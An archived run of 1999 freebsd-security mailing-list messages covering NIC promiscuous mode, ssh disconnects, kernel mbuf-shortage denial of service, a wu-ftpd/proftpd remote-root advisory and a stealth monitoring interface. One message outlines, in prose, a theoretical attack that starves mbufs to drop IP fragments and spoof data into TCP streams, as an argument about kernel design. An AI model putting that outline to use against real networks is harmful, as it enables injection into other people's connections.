wrote: > >> I do not claim to understand driver writing, but what about >ripping out >> the code that puts the NIC into promiscous mode? > >I'm not a software hacker, so I couldn't tell you if that would work, >but disabling that part of the driver might not be such a good idea. NICs can function without these parts (AFAIK). When a card is promiscous mode, it simply passes everything is picks up to the application layer (tcpdump, snoop, nmap, etc). When it's not in promiscous mode, there's a filter (for lack of a better word) that passes only those packets to the application layer. It's my understanding that promiscous mode just bypasses that filter. >> You would have to modify >> the code that allows the driver to change its MAC address, probably. But >> if you have good network monitors, you should be able to detect a machine >> that is pretending to be someone else pretty quickly. It's not encryption, >> but if you're blind, you can't read the written word. It doesn't solve >> your EM problems either. > >If a NIC changed it's MAC, it would loose connectivity. Some drivers (some of those for AIX, eg) allow you to change the mac address of a card. In fact, in a Sun box any extra NICs take on the mac address of the one on the motherboard. (Which is a little beyond me, but it makes it easier to configure the auto-install servers at work.) Thake the card to another machine and the mac address changes. Now, I've read ahead, and I know that your netowrk is routed by mac address, so it probably would loose it's connection. ^_^ > >> 'Course, I guess any user with half a brain could go out and get the >> original driver and put it in place -- this being an open source solution. >> So, I guess it's not such a good idea after all. > >Integrity checks withstanding, such a modification would prevent the >machine from connecting to the network. One day we will all be this paranoid. (I hope) ------------------------------------------------------------------------------- Staccato signals of constant information. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 23:34: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from mrelay.jrc.it (mrelay.jrc.it [139.191.1.65]) by hub.freebsd.org (Postfix) with ESMTP id 9BC7C1521E for ; Wed, 8 Sep 1999 23:33:57 -0700 (PDT) (envelope-from nick.hibma@jrc.it) Received: from elect8 (elect8.jrc.it [139.191.71.152]) by mrelay.jrc.it (LMC5692) with ESMTP id IAA08923; Thu, 9 Sep 1999 08:33:00 +0200 (MET DST) Date: Thu, 9 Sep 1999 08:33:01 +0200 (MET DST) From: Nick Hibma X-Sender: n_hibma@elect8 Reply-To: Nick Hibma To: "James C. Durham" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ssh disconnects In-Reply-To: <199909090021.AAA27391@w2xo.pgh.pa.us> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Best guess: A firewall is expiring your connection. If you have the problem that ftp connection go slower and slo-wer and slo-w-e-r after the first MegaByte, you probably use the same product as our friends around here. Nick > I have ssh forwarding ports from a machine on the internet to > another machine with a private IP here at my house. > > Everything works fine, except that the connection drops at irregular > intervals, from 20 minutes to 2 or 3 days with a "connection reset > by peer" message. > > I've experimented with keepalive and timeout in the config stuff to > no avail. The only thing that seems to help is to run a script > that sends the date from the remote server every 10 seconds. This > makes it stay up for a couple days. > > What's going on here? Any ideas? It's very annoying.. > > -Jim Durham > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- ISIS/STA, T.P.270, Joint Research Centre, 21020 Ispra, Italy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 0:35:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from florence.pavilion.net (florence.pavilion.net [194.242.128.25]) by hub.freebsd.org (Postfix) with ESMTP id 22F67150BD for ; Thu, 9 Sep 1999 00:35:43 -0700 (PDT) (envelope-from joe@florence.pavilion.net) Received: (from joe@localhost) by florence.pavilion.net (8.9.3/8.8.8) id IAA27000; Thu, 9 Sep 1999 08:35:05 +0100 (BST) (envelope-from joe) Date: Thu, 9 Sep 1999 08:35:05 +0100 From: Josef Karthauser To: "James C. Durham" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ssh disconnects Message-ID: <19990909083505.F58237@florence.pavilion.net> References: <199909090021.AAA27391@w2xo.pgh.pa.us> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i In-Reply-To: <199909090021.AAA27391@w2xo.pgh.pa.us> X-NCC-RegID: uk.pavilion Organisation: Pavilion Internet plc, 24 The Old Steine, Brighton, BN1 1EL, England Phone: +44-845-333-5000 Fax: +44-845-333-5001 Mobile: +44-403-596893 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 09, 1999 at 12:21:04AM +0000, James C. Durham wrote: > I have ssh forwarding ports from a machine on the internet to > another machine with a private IP here at my house. > > Everything works fine, except that the connection drops at irregular > intervals, from 20 minutes to 2 or 3 days with a "connection reset > by peer" message. > > I've experimented with keepalive and timeout in the config stuff to > no avail. The only thing that seems to help is to run a script > that sends the date from the remote server every 10 seconds. This > makes it stay up for a couple days. > > What's going on here? Any ideas? It's very annoying.. > I have the same problem, more or less. It occurs when my winbox goes into sleep mode - during that time all TCP connections get severed at some point, including interactive session - well annoying! Joe -- Josef Karthauser FreeBSD: How many times have you booted today? Technical Manager Viagra for your server (http://www.uk.freebsd.org) Pavilion Internet plc. [joe@pavilion.net, joe@uk.freebsd.org, joe@tao.org.uk] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 2: 2:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from sonet.crimea.ua (OTC-sl3-FLY.CRIS.NET [212.110.136.71]) by hub.freebsd.org (Postfix) with ESMTP id 0AC6C15024 for ; Thu, 9 Sep 1999 02:01:47 -0700 (PDT) (envelope-from stas@sonet.crimea.ua) Received: (from stas@localhost) by sonet.crimea.ua (8.8.8/8.8.8) id MAA16555 for freebsd-security@freebsd.org; Thu, 9 Sep 1999 12:02:45 +0400 (MSD) (envelope-from stas) Date: Thu, 9 Sep 1999 12:02:45 +0400 (MSD) From: Stas Kisel Message-Id: <199909090802.MAA16555@sonet.crimea.ua> To: freebsd-security@freebsd.org Subject: mbuf shortage situations Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > From: bmilekic@dsuper.net (Bosko Milekic) > Having MGET store that null (e.g. fail as opposed to panic) on a > M_WAIT seems fairly easy to fix, and would probably require some patching > that would ensure that the packet loss is handeled relatively 'cleanly' > (probably some debugging), but I wouldn't mind doing this. However, I'd > like to know if there are objections to doing this or, in fact, if there > are any suggestions on how to handle mbuf shortage situations (aside from > just limiting -- although limiting is in itself a good solution and I'm > glad that Brian F. is working on that). I really don't like limiting as an anti-DoS method. In user-based limiting limits have to be divided by "maximum number of users which can cooperate to make DoS" - quite inevident number. Especially if you have many easy-compromisable accounts - eg. shell server for a university classrooms. In process-based limiting limits also have to be divided by max proc per user. This results in very low, inconvenient limits. Probably there are another methods (kernel swapping comes to mind, but probably it is too hard to implement). IMHO it is a good idea to develop tcp_drain() from /sys/netinet/tcp_subr.c It should be quite intellectual to select a target - a process or a uid, which does not read properly from it's sockets, and has many data in mbufs. IMHO it is bad idea to drop packets, because this can be used for SPOOFING ARBITRARY DATA into TCP stream, which is very INSECURE[1]. Same goes for ALREADY implemented ip_drain() wich now seems to drop all fragments. Killing a process is not a good idea too, because it allows to DoS incorrectly developed applications. Attacker just have to feed so much network data, that application can not process it (I have no example, but it is easy to imagine an appplication, which spends more time to process requiest than network to transmit - a sort of database search or remote computing or so...). IMHO the best solution is to drop offending connection, though is can allow DoS too, if application can be made busy enough to not read from sockets. But this sort of applications can be DoS-ed anyways. Good applications have to read all their data from sockets. All other *_drain() functions should be implemented with the same care to determine offender and not allow DoS (/sys/netinet/in_proto.c). There are programs which use Unix Domain sockets and ICMP for causing DoS by mbuf starvation, if I recall correctly. This is a flaw in a _drain() method of eliminating this DoS - we have to find _all_ places where incorrect or hostile application can cause kernel to allocate mbufs. And remember about DoS when adding a new protocol or probably another code. m_reclaim() in /sys/kern/uipc_mbuf.c should be modified to (probably with all _drain interface) to determine correctly offending domain and protocol. It woild be very bad thing if in reply to frag flooding we will drop a, say, ssh connection. Or, probably, _drain functions each have to decide - "to drain or not to drain". IMHO 1-st way is better. -------------------------------- [1] Theoretical algorythm to spoof arbitrary data, based on possible flaw in ip_drain(). Requirements: 1. Ability to sniff traffic (eg, attacker is on the same Ethernet segment as victim) 2. quite slow connections of client to a target. - Sniff a network to find out a sequence number and a fragmented connection. - Wait for a moment when only one fragment (containing sensitive information) of a packed has arrived. - Cause mbuf starvaition by not reading from sockets (there are a lot of programs for it). - kernel drops all fragments, including one from target connection. - kill DoS-ing program - Assemble and spoof bogus fragment instead of dropped one. Note: The same algorythm can be used if you'll decide to drop TCP packets instead of ACK-ing them. Note: This algorytm is theoretical only - so probably I'm wrong. -------------------------------- \bye Stas PS. Would some of you, folks, be so kind to forward this message to an appropriate place, or just tell me about this place if I have mistaken by sending it only to -hackers and to -security. The trouble is in that I'm not familiar with unformal "what who does here" and "where which talks go". To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 2: 3:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from enst.enst.fr (enst.enst.fr [137.194.2.16]) by hub.freebsd.org (Postfix) with ESMTP id 922A515B6C for ; Thu, 9 Sep 1999 02:03:54 -0700 (PDT) (envelope-from beyssac@enst.fr) Received: from bofh.enst.fr (bofh-2.enst.fr [137.194.2.37]) by enst.enst.fr (8.9.1a/8.9.1) with ESMTP id LAA04726; Thu, 9 Sep 1999 11:03:34 +0200 (MET DST) Received: by bofh.enst.fr (Postfix, from userid 12426) id 85631D226; Thu, 9 Sep 1999 11:03:28 +0200 (CEST) Message-ID: <19990909110328.A69689@enst.fr> Date: Thu, 9 Sep 1999 11:03:28 +0200 From: Pierre Beyssac To: Foxfair Hu , security@FreeBSD.ORG Subject: Re: Fw: [ Kernel panic with FreeBSD-3.2-19990830-STABLE ] References: <37D12C8896.4BDAFOXFAIR@drago.cert.org.tw> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <37D12C8896.4BDAFOXFAIR@drago.cert.org.tw>; from Foxfair Hu on Sat, Sep 04, 1999 at 10:28:24PM +0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Sep 04, 1999 at 10:28:24PM +0800, Foxfair Hu wrote: > Forwarded by Foxfair Hu > ---------------- Original message follows ---------------- > From: Sebastien Petit > To: BUGTRAQ@SECURITYFOCUS.COM > Date: Thu, 2 Sep 1999 16:53:03 +0200 > Subject: [ Kernel panic with FreeBSD-3.2-19990830-STABLE ] > > Hi ! > > There is a problem with FreeBSD 3.2-RELEASE and -STABLE and perhaps > FreeBSD 3.x. > The system panics when a program does multiple access on nfs v3 mounted directory > with default mount options (ie: mount x.x.x.x:/nfs /usr2). Note that the author sent a PR about that just a few days before he posted to Bugtraq: kern/13488 -- Pierre Beyssac pb@enst.fr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 3:18:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id B0BDF1508B for ; Thu, 9 Sep 1999 03:18:44 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id UAA02113; Thu, 9 Sep 1999 20:15:49 +1000 (EST) From: Darren Reed Message-Id: <199909091015.UAA02113@cheops.anu.edu.au> Subject: Re: mbuf shortage situations To: stas@sonet.crimea.ua (Stas Kisel) Date: Thu, 9 Sep 1999 20:15:47 +1000 (EST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199909090802.MAA16555@sonet.crimea.ua> from "Stas Kisel" at Sep 9, 99 12:02:45 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Stas Kisel, sie said: [...] > IMHO it is a good idea to develop tcp_drain() from /sys/netinet/tcp_subr.c > It should be quite intellectual to select a target - a process or a uid, > which does not read properly from it's sockets, and has many data in mbufs. The problem with this is the BSD TCP/IP implementation ACK's (or at least attempts to ACK) data as soon as it is received and it is a big no-no to discard queued data that has already been ACK'd. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 3:40:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from sonet.crimea.ua (OTC-sl3-FLY.CRIS.NET [212.110.136.71]) by hub.freebsd.org (Postfix) with ESMTP id 4301014D4F; Thu, 9 Sep 1999 03:39:25 -0700 (PDT) (envelope-from stas@sonet.crimea.ua) Received: (from stas@localhost) by sonet.crimea.ua (8.8.8/8.8.8) id NAA18028; Thu, 9 Sep 1999 13:37:43 +0400 (MSD) (envelope-from stas) Date: Thu, 9 Sep 1999 13:37:43 +0400 (MSD) From: Stas Kisel Message-Id: <199909090937.NAA18028@sonet.crimea.ua> To: avalon@coombs.anu.edu.au Subject: Re: mbuf shortage situations Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <199909091015.UAA02113@cheops.anu.edu.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > From: Darren Reed > > In some mail from Stas Kisel, sie said: > [...] > > IMHO it is a good idea to develop tcp_drain() from /sys/netinet/tcp_subr.c > > It should be quite intellectual to select a target - a process or a uid, > > which does not read properly from it's sockets, and has many data in mbufs. > > The problem with this is the BSD TCP/IP implementation ACK's (or at least > attempts to ACK) data as soon as it is received and it is a big no-no to > discard queued data that has already been ACK'd. It is big no-no first to diskard a packet and then to continue connection. But we can easily send RST and drop connection (clean buffer first, because we don't have memory ever for RST packet, or send it only with the next packet, arrived on dropped connection, better). And this is probably what will happen if limit is reached, too. And in case of an evil thief had stolen Ethernet cable while connection in progress, too :) (Just why I think RFC should permit dropping connection). -- Stas Kisel. UNIX, security, C, TCP/IP, Web. UNIX - the best adventure game http://www.tekmetrics.com/transcript.shtml?pid=20053 http://www.crimea.edu +380(652)510222,230238 ; stas@crimea.edu stas@sonet.crimea.ua ; 2:460/54.4 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 3:46:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from sonet.crimea.ua (OTC-sl3-FLY.CRIS.NET [212.110.136.71]) by hub.freebsd.org (Postfix) with ESMTP id 67F35150BD; Thu, 9 Sep 1999 03:45:51 -0700 (PDT) (envelope-from stas@sonet.crimea.ua) Received: (from stas@localhost) by sonet.crimea.ua (8.8.8/8.8.8) id NAA18133; Thu, 9 Sep 1999 13:45:39 +0400 (MSD) (envelope-from stas) Date: Thu, 9 Sep 1999 13:45:39 +0400 (MSD) From: Stas Kisel Message-Id: <199909090945.NAA18133@sonet.crimea.ua> To: avalon@coombs.anu.edu.au, stas@sonet.crimea.ua Subject: Re: mbuf shortage situations Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <199909091015.UAA02113@cheops.anu.edu.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > From: Darren Reed > The problem with this is the BSD TCP/IP implementation ACK's (or at least > attempts to ACK) data as soon as it is received and it is a big no-no to > discard queued data that has already been ACK'd. Probably it is not self-evident why we HAVE to drop this connection. It is evil connection. Good applications do read data from their sockets, and evil ones do not. And ever if it is good, but silly or busy application, good clients do not send so much data that application can not process it. Am I wrong, there are any examples? -- Stas Kisel. UNIX, security, C, TCP/IP, Web. UNIX - the best adventure game http://www.tekmetrics.com/transcript.shtml?pid=20053 http://www.crimea.edu +380(652)510222,230238 ; stas@crimea.edu stas@sonet.crimea.ua ; 2:460/54.4 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 6: 2:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from exchange1.billfink.com (exchange1.billfink.com.247.64.63.IN-ADDR.ARPA [63.64.247.93]) by hub.freebsd.org (Postfix) with ESMTP id 9F28215133 for ; Thu, 9 Sep 1999 06:02:38 -0700 (PDT) (envelope-from bill@billfink.com) Received: by exchange1.billfink.com.247.64.63.IN-ADDR.ARPA with Internet Mail Service (5.5.2448.0) id ; Thu, 9 Sep 1999 09:03:02 -0400 Message-ID: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA> From: Bill Fink To: "'freebsd-security@freebsd.org'" Subject: FTP Vulnerability Date: Thu, 9 Sep 1999 09:03:01 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I truly apologize, I trust I'm overlooking something here. The advisory below states: >> Upgrade your wu-ftpd or proftpd >> ports to the most recent versions >> (any version after August 30, 1999 >> is not impacted by this problem). I've visited the mirrors for the WUFTP site(s) looking for the versions "after August 30" and there's NOTHING newer than MAY. Regards, Bill -----BEGIN PGP SIGNED MESSAGE----- ============================================================================ = FreeBSD-SA-99:03 Security Advisory FreeBSD, Inc. Topic: Two ftp daemons in ports vulnerable to attack. Category: ports Module: wu-ftpd and proftpd Announced: 1999-09-05 Affects: FreeBSD 3.2 (and earlier) FreeBSD-current before the correction date. Corrected: FreeBSD-3.3 RELEASE FreeBSD-current as of 1999/08/30 FreeBSD only: NO Patches: NONE I. Background wuftpd and proftpd have a flaw which can lead to a remote root compromise. They are both vulnerable since they are both based on a code base that is vulnerable. II. Problem Description Remote users can gain root via a buffer overflow. III. Impact Remote users can gain root. IV. Workaround Disable the ftp daemon until you can upgrade your system. V. Solution Upgrade your wu-ftpd or proftpd ports to the most recent versions (any version after August 30, 1999 is not impacted by this problem). If you are running non-port versions, you should verify that your version is not vulnerable or upgrade to using the ports version of these programs. ============================================================================ = FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org Security notifications: security-notifications@freebsd.org Security public discussion: freebsd-security@freebsd.org PGP Key: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================ = -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBN9MsfFUuHi5z0oilAQHKYQP/SGjOSQ8Ph8VqLtpStVOl6L0ocoYKv59R B6ow00bchILYV7qlsIGFhwMITZxZH0aGd0EAxwfFKwfvu36zSzAvu1rGrFCjT5Xd zefzAQUgj1/rWm3Jp1DxMd2BKCJrvTCOjKngIbbA2tH3AZ9xHiwefpqtIHVPikmy XR9gpyqCj/E= =dyHS -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 6: 2:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns2.infologigruppen.se (ns2.infologigruppen.se [212.214.163.69]) by hub.freebsd.org (Postfix) with ESMTP id 4274F1535C for ; Thu, 9 Sep 1999 06:02:43 -0700 (PDT) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: (from uucp@localhost) by ns2.infologigruppen.se (8.9.2/8.8.8) id KAA05448 for ; Thu, 9 Sep 1999 10:37:24 +0200 (CEST) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: from valhall.ign.se(192.168.3.1) via SMTP by bifrost-net.ign.se, id smtpdPS5446; Thu Sep 9 10:37:16 1999 Received: by valhall.ign.se with Internet Mail Service (5.5.2448.0) id ; Thu, 9 Sep 1999 10:37:15 +0200 Message-ID: From: "Lowkrantz, Goran" To: freebsd-security@FreeBSD.ORG Subject: Lisen only NIC Date: Thu, 9 Sep 1999 10:37:07 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To check on our DMZs I am building a monitor system with a protected interface connected to the internal network and a multiport card to monitor the consoles of the systems in the DMZs. To check for attacks I have setup Snort and have tested with the Vision IDS but I want to hide the network interface completely so that it can't be seen or heard or attacked or anything. I have looked in the handbook, security how-to and searched mailing lists but not found anything about how to do this. The monitor system is on 3-stable, at the moment 3.3RC. What I would like to have: A NIC listening on a connected network using one of the already used addresses without being seen and without disturbing any traffic. 1 - Is it possible to configure a NIC this way? 2 - If not, I have tried to re-use an IP address from the DMZ, set IPFW to allow all in and nothing out, but an arp from the DMZ still shows the IF. How do I block this? 3 - Am I off track? Is there a better way to do this? Cheers, GLZ --- Goran Lowkrantz Email : goran.lowkrantz@infologigruppen.se Infologigruppen Alfa AB Telephone: Nat 070-587 8782 Fax: Nat 070-615 8782 Box 202 Int +46 70-587 8782 Int +46 70-615 8782 941 25 Pitea, Sweden To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 6:16:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id 3A73B15133; Thu, 9 Sep 1999 06:15:55 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id XAA05192; Thu, 9 Sep 1999 23:15:43 +1000 (EST) From: Darren Reed Message-Id: <199909091315.XAA05192@cheops.anu.edu.au> Subject: Re: mbuf shortage situations To: stas@sonet.crimea.ua (Stas Kisel) Date: Thu, 9 Sep 1999 23:15:43 +1000 (EST) Cc: avalon@coombs.anu.edu.au, stas@sonet.crimea.ua, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <199909090945.NAA18133@sonet.crimea.ua> from "Stas Kisel" at Sep 9, 99 01:45:39 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Stas Kisel, sie said: > > > From: Darren Reed > > > The problem with this is the BSD TCP/IP implementation ACK's (or at least > > attempts to ACK) data as soon as it is received and it is a big no-no to > > discard queued data that has already been ACK'd. > > Probably it is not self-evident why we HAVE to drop this connection. > > It is evil connection. Good applications do read data from their sockets, > and evil ones do not. And ever if it is good, but silly or busy > application, good clients do not send so much data that application > can not process it. Am I wrong, there are any examples? So what if someone manages to crash a program due to a DOS attack ? An easy one that comes to mind is syslogd. It's often stuck in disk-wait and can easily be targetted with a large number of packets. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 6:19:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 7FC5F15133 for ; Thu, 9 Sep 1999 06:19:19 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id KAA08485; Thu, 9 Sep 1999 10:16:55 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199909091316.KAA08485@ns1.sminter.com.ar> Subject: Re: FTP Vulnerability In-Reply-To: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA> from Bill Fink at "Sep 9, 99 09:03:01 am" To: bill@billfink.com (Bill Fink) Date: Thu, 9 Sep 1999 10:16:54 -0300 (GMT) Cc: freebsd-security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Bill Fink escribió: [There is text before PGP section.] > > > I truly apologize, I trust I'm overlooking something here. > > The advisory below states: > > >> Upgrade your wu-ftpd or proftpd > >> ports to the most recent versions ^^^^^ Go to http://www.freebsd.org/ports and grab from there a new version. On WU-FTP sites you can find 2.5.0 + patches. Regards. Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA Diagonal Roque Sáenz Peńa 971, 4ş y 5ş piso. 1035 - Capital Federal, Argentina. (54-11) 4323-3333 http://www.via-net-works.net.ar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 6:25:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay.ucb.crimea.ua (relay.ucb.crimea.ua [212.110.138.1]) by hub.freebsd.org (Postfix) with ESMTP id 247FF14D4C for ; Thu, 9 Sep 1999 06:24:59 -0700 (PDT) (envelope-from ru@ucb.crimea.ua) Received: (from ru@localhost) by relay.ucb.crimea.ua (8.9.3/8.9.3/UCB) id QAA45393; Thu, 9 Sep 1999 16:22:56 +0300 (EEST) (envelope-from ru) Date: Thu, 9 Sep 1999 16:22:55 +0300 From: Ruslan Ermilov To: Bill Fink Cc: security@FreeBSD.ORG Subject: Re: FTP Vulnerability Message-ID: <19990909162255.A15548@relay.ucb.crimea.ua> Mail-Followup-To: Bill Fink , security@FreeBSD.ORG References: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA>; from Bill Fink on Thu, Sep 09, 1999 at 09:03:01AM -0400 X-Operating-System: FreeBSD 3.2-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 09, 1999 at 09:03:01AM -0400, Bill Fink wrote: > > > I truly apologize, I trust I'm overlooking something here. > > The advisory below states: > > >> Upgrade your wu-ftpd or proftpd > >> ports to the most recent versions > >> (any version after August 30, 1999 > >> is not impacted by this problem). > > I've visited the mirrors for the WUFTP site(s) looking for the versions > "after August 30" and there's NOTHING newer than MAY. > The versions we are talking about refer to the FreeBSD ports collection. Port of wu-ftpd (/usr/ports/net/wu-ftpd) has been upgraded to apply the following patch: ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/mapped.path.overrun.patch Cheers, -- Ruslan Ermilov Sysadmin and DBA of the ru@ucb.crimea.ua United Commercial Bank, ru@FreeBSD.org FreeBSD committer, +380.652.247.647 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 6:29: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from the.oneinsane.net (the.oneinsane.net [207.113.133.228]) by hub.freebsd.org (Postfix) with ESMTP id C4D2D14D4C for ; Thu, 9 Sep 1999 06:28:53 -0700 (PDT) (envelope-from insane@lunatic.oneinsane.net) Received: from lunatic.oneinsane.net (qmailr@lunatic.oneinsane.net [207.113.133.231]) by the.oneinsane.net (8.9.3/8.9.3) with SMTP id GAA09445 for ; Thu, 9 Sep 1999 06:28:44 -0700 (PDT) Received: (qmail 704 invoked by uid 1000); 9 Sep 1999 13:28:43 -0000 Date: Thu, 9 Sep 1999 06:28:43 -0700 From: "Ron 'The InSaNe One' Rosson" To: Bill Fink Cc: freebsd-security@freebsd.org Subject: Re: FTP Vulnerability Message-ID: <19990909062843.A590@lunatic.oneinsane.net> Reply-To: Ron Rosson References: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable X-Mailer: Mutt 0.95.6i In-Reply-To: <51D35DCFD7B0D21189440040333985C0013853@exchange1.billfink.com.247.64.63.IN-ADDR.ARPA>; from Bill Fink on Thu, Sep 09, 1999 at 09:03:01AM -0400 X-Operating-System: FreeBSD lunatic.oneinsane.net 3.2-STABLE X-Opinion: What you read here is my IMHO X-Disclaimer: I am a firm believer in RTFM X-WWW: http://www.oneinsane.net X-PGP-KEY: http://www.oneinsane.net/~insane/insane-pgp5i.txt X-Uptime: 6:26AM up 35 days, 22:30, 1 user, load averages: 0.16, 0.17, 0.22 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 09 Sep 1999, Bill Fink was heard blurting out: >=20 >=20 > I truly apologize, I trust I'm overlooking something here. >=20 > The advisory below states: >=20 > >> Upgrade your wu-ftpd or proftpd=20 > >> ports to the most recent versions > >> (any version after August 30, 1999=20 > >> is not impacted by this problem). >=20 > I've visited the mirrors for the WUFTP site(s) looking for the versions > "after August 30" and there's NOTHING newer than MAY. >=20 Take a look at the patches in the ports tree for these ports and you will see the changes. >=20 > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= 